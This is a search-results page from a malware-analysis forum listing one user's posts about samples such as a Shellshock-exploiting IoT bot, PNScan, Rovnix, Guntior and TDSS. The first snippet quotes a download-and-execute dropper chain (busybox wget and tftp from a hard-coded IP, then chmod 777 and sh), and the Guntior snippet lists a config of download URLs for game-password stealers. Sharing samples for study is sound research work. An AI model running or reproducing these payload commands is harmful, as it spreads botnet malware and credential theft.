A forum for reverse engineering, OS internals and malware analysis 

Search found 10 matches

 Go to advanced search

Re: Linux/Bash0day alias Shellshock alias Bashdoor

 by jioushizhu ¦  Tue Oct 11, 2016 4:42 am ¦  Forum: Malware ¦  Topic: Linux/Bash0day alias Shellshock alias Bashdoor ¦  Replies: 42 ¦  Views: 128034

https://github.com/gh0std4ncer/lizkebab 46.165.253.13:4574 ok cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; busybox wget http://46.165.253.13/IoT.sh; chmod 777 IoT.sh; sh IoT.sh; tftp 46.165.253.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.165.253.13; chmod...

Re: Linux/PNScan

 by jioushizhu ¦  Fri Aug 26, 2016 5:25 am ¦  Forum: Malware ¦  Topic: Linux/PNScan ¦  Replies: 27 ¦  Views: 36005

Found in the equipment of the China Telecom

arm.rar

Re: Linux/PNScan

 by jioushizhu ¦  Thu Aug 25, 2016 10:26 am ¦  Forum: Malware ¦  Topic: Linux/PNScan ¦  Replies: 27 ¦  Views: 36005

Found in a Lenovo newifi router in China
There are recheck and good2 these two files I did not upload, which is IP and password

muma.rar

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Wed Feb 05, 2014 1:01 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

rovnix_j.7z

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Tue Feb 04, 2014 12:45 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

VMware windows xp sp2 Boot BSOD

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Mon Feb 03, 2014 10:57 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

VBR Infectors - TrojanDropper:Win32/Rovnix.J (Microsoft) Droppers: https://www.virustotal.com/ru/file/3112e4e96d9a1308c93061e070172f81b92c03231b71b6ca02de06fae163fa72/analysis/ https://www.virustotal.com/ru/file/49014d90f42881140256dc8d8a629d2a110656c0931f98e032b1b313da70a7e1/analysis/ https://www....

Re: Guntior bootkit (Chinese combine)

 by jioushizhu ¦  Sat Jul 06, 2013 12:14 pm ¦  Forum: Malware ¦  Topic: Guntior bootkit (Chinese combine) ¦  Replies: 35 ¦  Views: 38302

Guntior dropper+dll+driver in attach Downloads a lot of online game password stealers. [info] isdown=1 huifang=60 jiange=5 /* interval=5 --hx1997 */ url1=http://122.224.8.92:904/a09.exe pid1=Lobby.exe /* 456游戏大厅 */ biaoshi1=ga5nm4 /* identifier=ga5nm4 */ url2=http://122.224.8.92:903/a11.exe pid2=QQ...

Re: Cidox bootkit downloader +

 by jioushizhu ¦  Mon Jan 21, 2013 5:12 am ¦  Forum: Malware ¦  Topic: Cidox bootkit downloader + ¦  Replies: 3 ¦  Views: 3336

Driver file time : 2012-5-3
Old version Cidox.b

Re: Cidox bootkit downloader +

 by jioushizhu ¦  Sun Jan 20, 2013 12:03 pm ¦  Forum: Malware ¦  Topic: Cidox bootkit downloader + ¦  Replies: 3 ¦  Views: 3336

Re: Rootkit MaxSS (alias TDSS, SST, Alureon.FE, Olmasco)

 by jioushizhu ¦  Sat Jan 05, 2013 10:44 am ¦  Forum: Malware ¦  Topic: Rootkit MaxSS (alias TDSS, SST, Alureon.FE, Olmasco) ¦  Replies: 149 ¦  Views: 164189

MaxSS